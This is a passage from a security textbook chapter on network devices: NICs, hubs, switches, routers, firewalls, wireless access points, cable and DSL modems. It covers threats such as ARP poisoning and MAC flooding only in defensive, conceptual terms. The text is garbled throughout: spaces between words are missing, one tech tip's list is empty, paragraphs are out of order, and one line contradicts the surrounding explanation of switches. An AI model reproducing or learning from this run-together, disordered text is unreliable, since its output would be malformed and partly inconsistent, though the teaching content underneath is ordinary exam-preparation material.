SecurityControlTestingWhenapplyingsecuritycontrolstoasystemtomanagesecurityoperations,itisimportanttotestthecontrolstoensurethattheyareprovidingthedesiredresults.PuttingasystemintoaVMdoesnotchangethisrequirement.Infact,itmaycomplicateitbecauseofthenatureoftheguestOStohypervisorrelationship.Itisessentialtospecificallytestallsecuritycontrolsinsidethevirtualenvironmenttoensuretheirbehaviorisstilleffective.
SandboxingSandboxingreferstothequarantineorisolationofasystemfromitssurroundings.Virtualizationcanbeusedasaformofsandboxingwithrespecttoanentiresystem.YoucanbuildaVM,testsomethinginsidetheVM,and,basedontheresults,makeadecisionwithregardtostabilityorwhateverconcernwaspresent.
MobileDevicesMobiledevicessuchaslaptops,tablets,andmobilephonesarethelatest
devicestojointhecorporatenetwork.Mobiledevicescancreateamajorsecuritygap,asausermayaccessseparatee-mailaccounts,onepersonal,withoutantivirusprotection,andtheothercorporate.MobiledevicesarecoveredindetailinChapter12.
DeviceSecurity,CommonConcernsAsmoreandmoreinteractivedevices(thatis,devicesyoucaninteractwithprogrammatically)arebeingdesigned,anewthreatsourcehasappeared.Inanattempttobuildsecurityintodevices,typically,adefaultaccountandpasswordmustbeenteredtoenabletheusertoaccessandconfigurethedeviceremotely.Thesedefaultaccountsandpasswordsarewellknowninthehackercommunity,sooneofthefirststepsyoumusttaketosecuresuchdevicesistochangethedefaultcredentials.Anyonewhohaspurchasedahomeofficerouterknowsthedefaultconfigurationsettingsandcanchecktoseeifanotheruserhaschangedtheirs.Iftheyhavenot,thisisahugesecurityhole,allowingoutsidersto“reconfigure”theirnetworkdevices.
TechTip
DefaultAccountsAlwaysreconfigurealldefaultaccountsonalldevicesbeforeexposingthemtoexternaltraffic.Thisistopreventothersfromreconfiguringyourdevicesbasedonknownaccesssettings.
NetworkAttachedStorageBecauseofthespeedoftoday’sEthernetnetworks,itispossibletomanagedatastorageacrossthenetwork.ThishasledtoatypeofstorageknownasNetworkAttachedStorage(NAS).Thecombinationofinexpensiveharddrives,fastnetworks,andsimpleapplication-based
servershasmadeNASdevicesintheterabyterangeaffordableforevenhomeusers.Becauseofthelargesizeofvideofiles,thishasbecomepopularforsomeusersasamethodofstoringTVandvideolibraries.BecauseNASisanetworkdevice,itissusceptibletovariousattacks,includingsniffingofcredentialsandavarietyofbrute-forceattackstoobtainaccesstothedata.
RemovableStorageBecauseremovabledevicescanmovedataoutsideofthecorporate-controlledenvironment,theirsecurityneedsmustbeaddressed.Removabledevicescanbringunprotectedorcorrupteddataintothecorporateenvironment.Allremovabledevicesshouldbescannedbyantivirussoftwareuponconnectiontothecorporateenvironment.Corporatepoliciesshouldaddressthecopyingofdatatoremovabledevices.ManymobiledevicescanbeconnectedviaUSBtoasystemandusedtostoredata—andinsomecasesvastquantitiesofdata.Thiscapabilitycanbeusedtoavoidsomeimplementationsofdatalosspreventionmechanisms.
NetworkingNetworksareusedtoconnectdevicestogether.Networksarecomposedofcomponentsthatperformnetworkingfunctionstomovedatabetweendevices.Networksbeginwithnetworkinterfacecards,thencontinueinlayersofswitchesandrouters.Specializednetworkingdevicesareusedforspecificpurposes,suchassecurityandtrafficmanagement.
NetworkInterfaceCardsToconnectaserverorworkstationtoanetwork,adeviceknownasanetworkinterfacecard(NIC)isused.ANICisacardwithaconnectorportforaparticulartypeofnetworkconnection,eitherEthernetorToken
Ring.ThemostcommonnetworktypeinuseforLANsistheEthernetprotocol,andthemostcommonconnectoristheRJ-45connector.ANICisthephysicalconnectionbetweenacomputerandthenetwork.
ThepurposeofaNICistoprovidelower-levelprotocolfunctionalityfromtheOSI(OpenSystemInterconnection)model.BecausetheNICdefinesthetypeofphysicallayerconnection,differentNICsareusedfordifferentphysicalprotocols.NICscomeassingle-portandmultiport,andmostworkstationsuseonlyasingle-portNIC,asonlyasinglenetworkconnectionisneeded.Figure10.1showsacommonformofaNIC.Forservers,multiportNICsareusedtoincreasethenumberofnetworkconnections,increasingthedatathroughputtoandfromthenetwork.
•Figure10.1Linksysnetworkinterfacecard(NIC)
EachNICportisserializedwithauniquecode,48bitslong,referredtoasaMediaAccessControladdress(MACaddress).Thesearecreatedbythemanufacturer,with24bitsrepresentingthemanufacturerand24bitsbeingaserialnumber,guaranteeinguniqueness.MACaddressesareusedintheaddressinganddeliveryofnetworkpacketstothecorrectmachineandinavarietyofsecuritysituations.Unfortunately,theseaddressescanbechanged,or“spoofed,”rathereasily.Infact,itiscommonforpersonalrouterstocloneaMACaddresstoallowuserstousemultipledevicesoveranetworkconnectionthatexpectsasingleMAC.
HubsAhubisnetworkingequipmentthatconnectsdevicesthatareusingthesameprotocolatthephysicallayeroftheOSImodel.Ahuballowsmultiplemachinesinanareatobeconnectedtogetherinastarconfiguration,withthehubasthecenter.ThisconfigurationcansavesignificantamountsofcableandisanefficientmethodofconfiguringanEthernetbackbone.Allconnectionsonahubshareasinglecollisiondomain,asmallclusterinanetworkwherecollisionsoccur.Asnetworktrafficincreases,itcanbecomelimitedbycollisions.Thecollisionissuehasmadehubsobsoleteinnewer,higherperformancenetworks,withinexpensiveswitchesandswitchedEthernetkeepingcostslowandusablebandwidthhigh.Hubsalsocreateasecurityweaknessinthatallconnecteddevicesseealltraffic,enablingsniffingandeavesdroppingtooccur.Intoday’snetworks,hubshaveallbutdisappeared,beingreplacedbylow-costswitches.
TechTip
Device/OSILevelInteraction
DifferentnetworkdevicesoperateusingdifferentlevelsoftheOSInetworkingmodeltomovepacketsfromdevicetodevice:
BridgesBridgesarenetworkingequipmentthatconnectdevicesusingthesameprotocolatthedatalinklayeroftheOSImodel.Abridgeoperatesatthedatalinklayer,filteringtrafficbasedonMACaddresses.Bridgescanreducecollisionsbyseparatingpiecesofanetworkintotwoseparatecollisiondomains,butthisonlycutsthecollisionprobleminhalf.Althoughbridgesareuseful,abettersolutionistouseswitchesfornetworkconnections.
SwitchesAswitchformsthebasisforconnectionsinmostEthernet-basedLANs.Althoughhubsandbridgesstillexist,intoday’shigh-performancenetworkenvironment,switcheshavereplacedboth.Aswitchhasseparatecollision
domainsforeachport.Thismeansthatforeachport,twocollisiondomainsexist:onefromtheporttotheclientonthedownstreamside,andonefromtheswitchtothenetworkupstream.Whenfullduplexisemployed,collisionsarevirtuallyeliminatedfromthetwonodes,hostandclient.Thisalsoactsasahub-basedsystem,whereasinglesniffercanseeallofthetraffictoandfromconnecteddevices.Switchesoperateatthedatalinklayer,whileroutersactatthenetwork
layer.Forintranets,switcheshavebecomewhatroutersareontheInternet—thedeviceofchoiceforconnectingmachines.Asswitcheshavebecometheprimarynetworkconnectivitydevice,additionalfunctionalityhasbeenaddedtothem.AswitchisusuallyaLayer2device,butLayer3switchesincorporateroutingfunctionality.Hubshavebeenreplacedbyswitchesbecauseswitchesperforma
numberoffeaturesthathubscannotperform.Forexample,theswitchimprovesnetworkperformancebyfilteringtraffic.Itfilterstrafficbyonlysendingthedatatotheportontheswitchthatthedestinationsystemresideson.Theswitchknowswhatporteachsystemisconnectedtoandsendsthedataonlytothatport.Theswitchalsoprovidessecurityfeatures,suchastheoptiontodisableaportsothatitcannotbeusedwithoutauthorization.Theswitchalsosupportsafeaturecalledportsecurity,whichallowstheadministratortocontrolwhichsystemscansenddatatoeachoftheports.TheswitchusestheMACaddressofthesystemstoincorporatetrafficfilteringandportsecurityfeatures,whichiswhyitisconsideredaLayer2device.
ExamTip:MACfilteringcanbeemployedonswitches,permittingonlyspecifiedMACstoconnecttotheswitch.ThiscanbebypassedifanattackercanlearnanallowedMAC,astheycanclonethepermittedMAContotheirownNICcardandspooftheswitch.Tofilteredgeconnections,IEEE802.1XismoresecureandiscoveredinChapter11.ThiscanalsobereferredtoasMAClimiting.Becarefultopayattentiontocontextontheexam,however,becauseMAClimitingalsocanrefertopreventingfloodingattacksonswitchesbylimitingthenumberofMACaddressesthatcanbe“learned”byaswitch.
PortaddresssecuritybasedonMACaddressescandeterminewhetherapacketisallowedorblockedfromaconnection.Thisistheveryfunctionthatafirewallusesforitsdetermination,andthissamefunctionalityiswhatallowsan802.1Xdevicetoactasan“edgedevice.”
ExamTip:Networktrafficsegregationbyswitchescanalsoactasasecuritymechanism,preventingaccesstosomedevicesfromotherdevices.Thiscanpreventsomeonefromaccessingcriticaldataserversfromamachineinapublicarea.
Oneofthesecurityconcernswithswitchesisthat,likerouters,theyareintelligentnetworkdevicesandarethereforesubjecttohijackingbyhackers.Shouldahackerbreakintoaswitchandchangeitsparameters,hemightbeabletoeavesdroponspecificorallcommunications,virtuallyundetected.SwitchesarecommonlyadministeredusingtheSimpleNetworkManagementProtocol(SNMP)andTelnetprotocol,bothofwhichhaveaseriousweaknessinthattheysendpasswordsacrossthenetworkincleartext.Ahackerarmedwithasnifferthatobservesmaintenanceonaswitchcancapturetheadministrativepassword.Thisallowsthehackertocomebacktotheswitchlaterandconfigureitasanadministrator.Anadditionalproblemisthatswitchesareshippedwithdefaultpasswords,andifthesearenotchangedwhentheswitchissetup,theyofferanunlockeddoortoahacker.
Tosecureaswitch,youshoulddisableallaccessprotocolsotherthanasecureseriallineorasecureprotocolsuchasSecureShell(SSH).Usingonlysecuremethodstoaccessaswitchwilllimittheexposuretohackersandmalicioususers.Maintainingsecurenetworkswitchesisevenmoreimportantthansecuringindividualboxes,forthespanofcontroltointerceptdataismuchwideronaswitch,especiallyifit’sreprogrammedbyahacker.
Switchesarealsosubjecttoelectronicattacks,suchasARPpoisoning
andMACflooding.ARPpoisoningiswhereadevicespoofstheMACaddressofanotherdevice,attemptingtochangetheARPtablesthroughspoofedtrafficandtheARPtable-updatemechanism.MACfloodingiswhereaswitchisbombardedwithpacketsfromdifferentMACaddresses,floodingtheswitchtableandforcingthedevicetorespondbyopeningallportsandactingasahub.Thisenablesdevicesonothersegmentstosnifftraffic.
LoopProtectionSwitchesoperateatLayer2,atwhichthereisnocountdownmechanismtokillpacketsthatgetcaughtinloopsoronpathsthatwillneverresolve.TheLayer2spaceactsasamesh,wherepotentiallytheadditionofanewdevicecancreateloopsintheexistingdeviceinterconnections.Topreventloops,atechnologycalledspanningtreesisemployedbyvirtuallyallswitches.TheSpanningTreeProtocol(STP)allowsformultiple,redundantpaths,whilebreakingloopstoensureaproperbroadcastpattern.LoopprotectioniscoveredindetailinChapter9.
RoutersArouterisanetworktrafficmanagementdeviceusedtoconnectdifferentnetworksegmentstogether.Routersoperateatthenetworklayer(Layer3)oftheOSImodel,usingthenetworkaddress(typicallyanIPaddress)toroutetrafficandusingroutingprotocolstodetermineoptimalroutingpathsacrossanetwork.RoutersformthebackboneoftheInternet,movingtrafficfromnetworktonetwork,inspectingpacketsfromeverycommunicationastheymovetrafficinoptimalpaths.Routersoperatebyexaminingeachpacket,lookingatthedestination
address,andusingalgorithmsandtablestodeterminewheretosendthepacketnext.Thisprocessofexaminingtheheadertodeterminethenexthopcanbedoneinquickfashion.
ACLscanrequiresignificantefforttoestablishandmaintain.Creatingthemisastraightforwardtask,buttheirjudicioususewillyieldsecuritybenefitswithalimitedamountofmaintenance.CiscoroutershavestandardandextendedACLs;standardACLscanfiltertrafficbasedonlyonthesourceIPaddress,whereasextendedACLscanfiltertrafficbysource/destinationIPaddress,protocol,andport.ThiscanbeveryimportantinsecurityzonessuchasaDMZandatedgedevices,blockingundesiredoutsidecontactwhileallowingknowninsidetraffic.
Routersuseaccesscontrollists(ACLs)asamethodofdecidingwhetherapacketisallowedtoenterthenetwork.WithACLs,itisalsopossibletoexaminethesourceaddressanddeterminewhetherornottoallowapackettopass.ThisallowsroutersequippedwithACLstodroppacketsaccordingtorulesbuiltintotheACLs.Thiscanbeacumbersomeprocesstosetupandmaintain,andastheACLgrowsinsize,routingefficiencycanbedecreased.Itisalsopossibletoconfiguresomerouterstoactasquasi–applicationgateways,performingstatefulpacketinspectionandusingcontentsaswellasIPaddressestodeterminewhetherornottopermitapackettopass.Thiscantremendouslyincreasethetimeforaroutertopasstrafficandcansignificantlydecreaserouterthroughput.ConfiguringACLsandotheraspectsofsettinguproutersforthistypeofusearebeyondthescopeofthisbook.Oneserioussecurityconcernregardingrouteroperationislimitingwho
hasaccesstotherouterandcontrolofitsinternalfunctions.Likeaswitch,aroutercanbeaccessedusingSNMPandTelnetandprogrammedremotely.Becauseofthegeographicseparationofrouters,thiscanbecomeanecessity,formanyroutersintheworldoftheInternetcanbehundredsofmilesapart,inseparatelockedstructures.Physicalcontroloverarouterisabsolutelynecessary,forifanydevice,beitaserver,switch,orrouter,isphysicallyaccessedbyahacker,itshouldbeconsideredcompromised.Thus,suchaccessmustbeprevented.Aswithswitches,itisimportanttoensurethattheadministratorpasswordisneverpassedintheclear,thatonlysecuremechanismsareusedtoaccesstherouter,andthatallofthedefaultpasswordsareresettostrongpasswords.
Aswithswitches,themostassuredpointofaccessforroutermanagementcontrolisviatheserialcontrolinterfaceport.Thisallowsaccesstothecontrolaspectsoftherouterwithouthavingtodealwithtraffic-relatedissues.Forinternalcompanynetworks,wherethegeographicdispersionofroutersmaybelimited,third-partysolutionstoallowout-of-bandremotemanagementexist.Thisallowscompletecontrolovertherouterinasecurefashion,evenfromaremotelocation,althoughadditionalhardwareisrequired.Routersareavailablefromnumerousvendorsandcomeinsizesbigand
small.Atypicalsmallhomeofficerouterforusewithcablemodem/DSLserviceisshowninFigure10.2.Largerrouterscanhandletrafficofuptotensofgigabytespersecondperchannel,usingfiber-opticinputsandmovingtensofthousandsofconcurrentInternetconnectionsacrossthenetwork.Theserouters,whichcancosthundredsofthousandsofdollars,formanessentialpartofe-commerceinfrastructure,enablinglargeenterprisessuchasAmazonandeBaytoservemanycustomers’useconcurrently.
•Figure10.2Asmallhomeofficerouterforcablemodem/DSL
FirewallsAfirewallisanetworkdevice—hardware,software,oracombinationthereof—whosepurposeistoenforceasecuritypolicyacrossitsconnectionsbyallowingordenyingtraffictopassintooroutofthenetwork.Afirewallisalotlikeagateguardatasecurefacility.Theguardexaminesallthetraffictryingtoenterthefacility—carswiththecorrectstickerordeliverytruckswiththeappropriatepaperworkareallowedin;everyoneelseisturnedaway(seeFigure10.3).
•Figure10.3Howafirewallworks
ExamTip:Afirewallisanetworkdevice(hardware,software,orcombinationofthetwo)thatenforcesasecuritypolicy.Allnetworktrafficpassingthroughthefirewallisexamined—trafficthatdoesnotmeetthespecifiedsecuritycriteriaorviolatesthefirewallpolicyisblocked.
Theheartofafirewallisthesetofsecuritypoliciesthatitenforces.Managementdetermineswhatisallowedintheformofnetworktrafficbetweendevices,andthesepoliciesareusedtobuildrulesetsforthefirewalldevicesusedtofilternetworktrafficacrossthenetwork.
TechTip
FirewallRulesFirewallsareinrealitypolicyenforcementdevices.Eachruleinafirewallshouldhaveapolicybehindit,asthisistheonlymannerofmanagingfirewallrulesetsovertime.Thestepsforsuccessfulfirewallmanagementbeginandendwithmaintainingapolicylistbyfirewallofthetrafficrestrictionstobeimposed.Managingthislistviaaconfigurationmanagementprocessisimportanttopreventnetworkinstabilitiesfromfaultyrulesetsorunknown“left-over”rules.
Orphanorleft-overrulesarerulesthatwerecreatedforaspecialpurpose(testing,emergency,visitororvendor,etc.)andthenforgottenaboutandnotremovedaftertheiruseended.Theserulescanclutterupafirewallandresultinunintendedchallengestothenetworksecurityteam.
Firewallsecuritypoliciesareaseriesofrulesthatdefineswhattrafficispermissibleandwhattrafficistobeblockedordenied.Thesearenotuniversalrules,andtherearemanydifferentsetsofrulesforasinglecompanywithmultipleconnections.AwebserverconnectedtotheInternetmaybeconfiguredonlytoallowtrafficonport80forHTTP,and
haveallotherportsblocked.Ane-mailservermayhaveonlynecessaryportsfore-mailopen,withothersblocked.Akeytosecuritypoliciesforfirewallsisthesameashasbeenseenforothersecuritypolicies—theprincipleofleastaccess.Onlyallowthenecessaryaccessforafunction;blockordenyallunneededfunctionality.Howanorganizationdeploysitsfirewallsdetermineswhatisneededforsecuritypoliciesforeachfirewall.Youmayevenhaveasmalloffice–homeofficefirewallatyourhouse,suchastheRVS4000showninFigure10.4.ThisdevicefromLinksysprovidesbothroutingandfirewallfunctions.
•Figure10.4LinksysRVS4000SOHOfirewall
Thesecuritytopologydetermineswhatnetworkdevicesareemployedatwhatpointsinanetwork.Ataminimum,thecorporateconnectiontotheInternetshouldpassthroughafirewall,asshowninFigure10.5.Thisfirewallshouldblockallnetworktrafficexceptthatspecificallyauthorizedbythesecuritypolicy.Thisisactuallyeasytodo:blockingcommunicationsonaportissimplyamatteroftellingthefirewalltoclosetheport.Theissuecomesindecidingwhatservicesareneededandby
whom,andthuswhichportsshouldbeopenandwhichshouldbeclosed.Thisiswhatmakesasecuritypolicyusefulbut,insomecases,difficulttomaintain.
•Figure10.5LogicaldepictionofafirewallprotectinganorganizationfromtheInternet
Theperfectfirewallpolicyisonethattheenduserneverseesandonethatneverallowsevenasingleunauthorizedpackettoenterthenetwork.Aswithanyotherperfectitem,itwillberaretofindtheperfectsecuritypolicyforafirewall.Todevelopacompleteandcomprehensivesecuritypolicy,itisfirst
necessarytohaveacompleteandcomprehensiveunderstandingofyournetworkresourcesandtheiruses.Onceyouknowwhatyournetworkwillbeusedfor,youwillhaveanideaofwhattopermit.Also,onceyouunderstandwhatyouneedtoprotect,youwillhaveanideaofwhattoblock.Firewallsaredesignedtoblockattacksbeforetheygettoatargetmachine.Commontargetsarewebservers,e-mailservers,DNSservers,FTPservices,anddatabases.Eachofthesehasseparatefunctionality,andeachofthesehasseparatevulnerabilities.Onceyouhavedecidedwhoshouldreceivewhattypeoftrafficandwhattypesshouldbeblocked,youcanadministerthisthroughthefirewall.
Routershelpcontroltheflowoftrafficintoandoutofyournetwork.ThroughtheuseofACLs,routerscanactasfirst-levelfirewallsandcanhelpweedoutmalicioustraffic.
HowDoFirewallsWork?Firewallsenforcetheestablishedsecuritypolicies.Theycandothisthroughavarietyofmechanisms,including:
NetworkAddressTranslation(NAT)AsyoumayrememberfromChapter9,NATtranslatesprivate(nonroutable)IPaddressesintopublic(routable)IPaddresses.
BasicpacketfilteringBasicpacketfilteringlooksateachpacketenteringorleavingthenetworkandtheneitheracceptsthepacketorrejectsthepacketbasedonuser-definedrules.Eachpacketisexaminedseparately.
StatefulpacketfilteringStatefulpacketfilteringalsolooksateachpacket,butitcanexaminethepacketinitsrelationtootherpackets.Statefulfirewallskeeptrackofnetworkconnectionsandcanapplyslightlydifferentrulesetsbasedonwhetherthepacketispartofanestablishedsessionornot.
NATistheprocessofmodifyingnetworkaddressinformationindatagrampacketheaderswhileintransitacrossatrafficroutingdevice,suchasarouterorfirewall,forthepurposeofremappingagivenaddressspaceintoanother.SeeChapter9foramoredetaileddiscussiononNAT.
Accesscontrollists(ACLs)ACLsaresimplerulesetsthatareappliedtoportnumbersandIPaddresses.Theycanbeconfiguredforinboundandoutboundtrafficandaremostcommonlyusedonroutersandswitches.
ApplicationlayerproxiesAnapplicationlayerproxycanexaminethecontentofthetrafficaswellastheportsandIPaddresses.Forexample,anapplicationlayerhastheabilitytolookinsideauser’swebtraffic,detectamaliciouswebsiteattemptingtodownloadmalwaretotheuser’ssystem,andblockthemalware.
OneofthemostbasicsecurityfunctionsprovidedbyafirewallisNAT.Thisserviceallowsyoutomasksignificantamountsofinformationfromoutsideofthenetwork.Thisallowsanoutsideentitytocommunicatewithanentityinsidethefirewallwithouttrulyknowingitsaddress.Basicpacketfiltering,alsoknownasstatelesspacketinspection,
involveslookingatpackets,theirprotocolsanddestinations,andcheckingthatinformationagainstthesecuritypolicy.TelnetandFTPconnectionsmaybeprohibitedfrombeingestablishedtoamailordatabaseserver,buttheymaybeallowedfortherespectiveserviceservers.Thisisafairlysimplemethodoffilteringbasedoninformationineachpacketheader,likeIPaddressesandTCP/UDPports.Thiswillnotdetectandcatchallundesiredpackets,butitisfastandefficient.Tolookatallpackets,determiningtheneedforeachanditsdata,
requiresstatefulpacketfiltering.Advancedfirewallsemploystatefulpacketfilteringtopreventseveraltypesofundesiredcommunications.Shouldapacketcomefromoutsidethenetwork,inanattempttopretendthatitisaresponsetoamessagefrominsidethenetwork,thefirewallwill
havenorecordofitbeingrequestedandcandiscardit,blockingaccess.Asmanycommunicationswillbetransferredtohighports(above1023),statefulmonitoringwillenablethesystemtodeterminewhichsetsofhigh-portcommunicationsarepermissibleandwhichshouldbeblocked.Thedisadvantagetostatefulmonitoringisthatittakessignificantresourcesandprocessingtodothistypeofmonitoring,andthisreducesefficiencyandrequiresmorerobustandexpensivehardware.However,thistypeofmonitoringisessentialintoday’scomprehensivenetworks,particularlygiventhevarietyofremotelyaccessibleservices.
TechTip
FirewallsandAccessControlListsManyfirewallsreadfirewallandACLrulesfromtoptobottomandapplytherulesinsequentialordertothepacketstheyareinspecting.Typicallytheywillstopprocessingruleswhentheyfindarulethatmatchesthepackettheyareexamining.Ifthefirstlineinyourrulesetreads“allowalltraffic,”thenthefirewallwillpassanynetworktrafficcomingintoorleavingthefirewall—ignoringtherestofyourrulesbelowthatline.Manyfirewallshaveanimplied“denyall”lineaspartoftheirrulesets.Thismeansthatanytrafficthatisnotspecificallyallowedbyarulewillgetblockedbydefault.
Astheyareinrouters,switches,servers,andothernetworkdevices,ACLsareacornerstoneofsecurityinfirewalls.Justasyoumustprotectthedevicefromphysicalaccess,ACLsdothesametaskforelectronicaccess.FirewallscanextendtheconceptofACLsbyenforcingthematapacketlevelwhenpacket-levelstatefulfilteringisperformed.Thiscanaddanextralayerofprotection,makingitmoredifficultforanoutsidehackertobreachafirewall.
ExamTip:Manyfirewallscontain,bydefault,animplicitdenyattheendofeveryACLorfirewallruleset.Thissimplymeansthatanytrafficnotspecificallypermittedbyapreviousrule
intherulesetisdenied.
Somehigh-securityfirewallsalsoemployapplicationlayerproxies.Asthenameimplies,packetsarenotallowedtotraversethefirewall,butdatainsteadflowsuptoanapplicationthatinturndecideswhattodowithit.Forexample,anSMTPproxymayacceptinboundmailfromtheInternetandforwardittotheinternalcorporatemailserver,asdepictedinFigure10.6.Whileproxiesprovideahighlevelofsecuritybymakingitverydifficultforanattackertomanipulatetheactualpacketsarrivingatthedestination,andwhiletheyprovidetheopportunityforanapplicationtointerpretthedatapriortoforwardingittothedestination,theygenerallyarenotcapableofthesamethroughputasstatefulpacket-inspectionfirewalls.Thetrade-offbetweenperformanceandspeedisacommononeandmustbeevaluatedwithrespecttosecurityneedsandperformancerequirements.
•Figure10.6FirewallwithSMTPapplicationlayerproxy
TechTip
FirewallOperationsApplicationlayerfirewallssuchasproxyserverscananalyzeinformationintheheaderanddataportionofthepacket,whereaspacket-filteringfirewallscananalyzeonlytheheaderofa
packet.
Firewallscanalsoactasnetworktrafficregulatorsinthattheycanbeconfiguredtomitigatespecifictypesofnetwork-basedattacks.Indenial-of-serviceanddistributeddenial-of-serviceattacks,anattackercanattempttofloodanetworkwithtraffic.Firewallscanbetunedtodetectthesetypesofattacksandactasfloodguards,mitigatingtheeffectonthenetwork.
ExamTip:Firewallscanactasfloodguards,detectingandmitigatingspecifictypesofDoS/DDoSattacks.
Next-GenerationFirewallsFirewallsoperatebyinspectingpacketsandbyusingrulesassociatedwithIPaddressesandports.Next-generationfirewallshavesignificantlymorecapabilityandarecharacterizedbythesefeatures:
Deeppacketinspection
Movebeyondport/protocolinspectionandblocking
Addapplication-levelinspection
Addintrusionprevention
Bringintelligencefromoutsidethefirewall
Next-generationfirewallsaremorethanjustafirewallandIDScoupledtogether;theyofferadeeperlookatwhatthenetworktrafficrepresents.Inalegacyfirewall,withport80open,allwebtrafficisallowedtopass.Usinganext-generationfirewall,trafficoverport80canbeseparatedbywebsite,orevenactivityonawebsite(forexample,allowFacebook,butnotgamesonFacebook).Becauseofthedeeperpacketinspectionandthe
abilitytocreaterulesbasedoncontent,trafficcanbemanagedbasedoncontent,notmerelysiteorURL.
WebApplicationFirewallsvs.NetworkFirewallsIncreasingly,theterm“firewall”isgettingattachedtoanydeviceorsoftwarepackagethatisusedtocontroltheflowofpacketsordataintooroutofanorganization.Forexample,awebapplicationfirewallisthetermgiventoanysoftwarepackage,appliance,orfilterthatappliesarulesettoHTTP/HTTPStraffic.WebapplicationfirewallsshapewebtrafficandcanbeusedtofilteroutSQLinjectionattacks,malware,cross-sitescripting(XSS),andsoon.Bycontrast,anetworkfirewallisahardwareorsoftwarepackagethatcontrolstheflowofpacketsintoandoutofanetwork.Webapplicationfirewallsoperateontrafficatamuchhigherlevelthannetworkfirewalls,aswebapplicationfirewallsmustbeabletodecodethewebtraffictodeterminewhetherornotitismalicious.Networkfirewallsoperateonmuchsimpleraspectsofnetworktrafficsuchassource/destinationportandsource/destinationaddress.
ConcentratorsNetworkdevicescalledconcentratorsactastrafficmanagementdevices,managingflowsfrommultiplepointsintosinglestreams.Concentratorstypicallyactasendpointsforaparticularprotocol,suchasSSL/TLSorVPN.Theuseofspecializedhardwarecanenablehardware-basedencryptionandprovideahigherlevelofspecificservicethanageneral-purposeserver.Thisprovidesbotharchitecturalandfunctionalefficiencies.
WirelessDevicesWirelessdevicesbringadditionalsecurityconcerns.Thereis,bydefinition,nophysicalconnectiontoawirelessdevice;radiowavesor
infraredcarrydata,whichallowsanyonewithinrangeaccesstothedata.Thismeansthatunlessyoutakespecificprecautions,youhavenocontroloverwhocanseeyourdata.Placingawirelessdevicebehindafirewalldoesnotdoanygood,becausethefirewallstopsonlyphysicallyconnectedtrafficfromreachingthedevice.Outsidetrafficcancomeliterallyfromtheparkinglotdirectlytothewirelessdeviceandintothenetwork.Thepointofentryfromawirelessdevicetoawirednetworkis
performedatadevicecalledawirelessaccesspoint.Wirelessaccesspointscansupportmultipleconcurrentdevicesaccessingnetworkresourcesthroughthenetworknodetheycreate.Atypicalwirelessaccesspointisshownhere.
•Atypicalwirelessaccesspoint
Topreventunauthorizedwirelessaccesstothenetwork,configurationofremoteaccessprotocolstoawirelessaccesspointiscommon.Forcingauthenticationandverifyingauthorizationisaseamlessmethodofperformingbasicnetworksecurityforconnectionsinthisfashion.TheseaccessprotocolsarecoveredinChapter11.
Severalmechanismscanbeusedtoaddwirelessfunctionalitytoamachine.ForPCs,thiscanbedoneviaanexpansioncard.Fornotebooks,aPCMCIAadapterforwirelessnetworksisavailablefromseveralvendors.ForbothPCsandnotebooks,vendorshaveintroducedUSB-basedwirelessconnectors.Thefollowingillustrationshowsonevendor’scard—notetheextendedlengthusedasanantenna.Notallcardshavethesameconfiguration,althoughtheyallperformthesamefunction:toenableawirelessnetworkconnection.Thenumerouswirelessprotocols(802.11a,b,g,i,andn)arecoveredinChapter12.Wirelessaccesspointsandcardsmustbematchedbyprotocolforproperoperation.
ModemsModemswereonceaslowmethodofremoteconnectionthatwasusedtoconnectclientworkstationstoremoteservicesoverstandardtelephonelines.Modemisashortenedformofmodulator/demodulator,convertinganalogsignalstodigitalandviceversa.Connectingadigitalcomputersignaltotheanalogtelephonelinerequiredoneofthesedevices.Today,theuseofthetermhasexpandedtocoverdevicesconnectedtospecialdigitaltelephonelines—DSLmodems—andtocabletelevisionlines—cablemodems.Althoughthesedevicesarenotactuallymodemsinthetruesenseoftheword,thetermhasstuckthroughmarketingeffortsdirectedtoconsumers.DSLandcablemodemsofferbroadbandhigh-speedconnectionsandtheopportunityforcontinuousconnectionstotheInternet.Alongwiththesenewdesirablecharacteristicscomesomeundesirableones,however.Althoughtheybothprovidethesametypeofservice,cableandDSLmodemshavesomedifferences.ADSLmodemprovidesadirect
connectionbetweenasubscriber’scomputerandanInternetconnectionatthelocaltelephonecompany’sswitchingstation.Thisprivateconnectionoffersadegreeofsecurity,asitdoesnotinvolveotherssharingthecircuit.Cablemodemsaresetupinsharedarrangementsthattheoreticallycouldallowaneighbortosniffauser’scablemodemtraffic.
•AtypicalPCMCIAwirelessnetworkcard
Cablemodemsweredesignedtoshareapartylineintheterminalsignalarea,andthecablemodemstandard,DataOverCableServiceInterfaceSpecification(DOCSIS),wasdesignedtoaccommodatethisconcept.DOCSISincludesbuilt-insupportforsecurityprotocols,including
authenticationandpacketfiltering.Althoughthisdoesnotguaranteeprivacy,itpreventsordinarysubscribersfromseeingothers’trafficwithoutusingspecializedhardware.Figure10.7isamoderncablemodem.Ithasanimbeddedwireless
accesspoint,aVoIPconnection,alocalrouter,andDHCPserver.Thesizeofthedeviceisfairlylarge,butithasabuilt-inlead-acidbatterytoprovideVoIPservicewhenpowerisout.
•Figure10.7Moderncablemodem
BothcableandDSLservicesaredesignedforacontinuousconnection,whichbringsupthequestionofIPaddresslifeforaclient.AlthoughsomeservicesoriginallyusedastaticIParrangement,virtuallyallhavenowadoptedtheDynamicHostConfigurationProtocol(DHCP)tomanagetheiraddressspace.AstaticIPaddresshasanadvantageofremainingthesameandenablingconvenientDNSconnectionsforoutsideusers.AscableandDSLservicesareprimarilydesignedforclientservicesasopposedtohostservices,thisisnotarelevantissue.AsecurityissueofastaticIPaddressisthatitisastationarytargetforhackers.ThemovetoDHCPhasnotsignificantlylessenedthisthreat,however,becausethetypicalIPleaseonacablemodemDHCPserverisfordays.Thisisstillrelativelystationary,andsomeformoffirewallprotectionneedstobeemployedbytheuser.
Cable/DSLSecurityThemodemequipmentprovidedbythesubscriptionserviceconvertsthecableorDSLsignalintoastandardEthernetsignalthatcanthenbeconnectedtoaNIContheclientdevice.Thisisstilljustadirectnetworkconnection,withnosecuritydeviceseparatingthetwo.Themostcommonsecuritydeviceusedincable/DSLconnectionsisarouterthatactsasahardwarefirewall.Thefirewall/routerneedstobeinstalledbetweenthecable/DSLmodemandclientcomputers.
TelephonyAprivatebranchexchange(PBX)isanextensionofthepublictelephonenetworkintoabusiness.Althoughtypicallyconsideredseparateentitiesfromdatasystems,PBXsarefrequentlyinterconnectedandhavesecurityrequirementsaspartofthisinterconnection,aswellassecurityrequirementsoftheirown.PBXsarecomputer-basedswitchingequipment
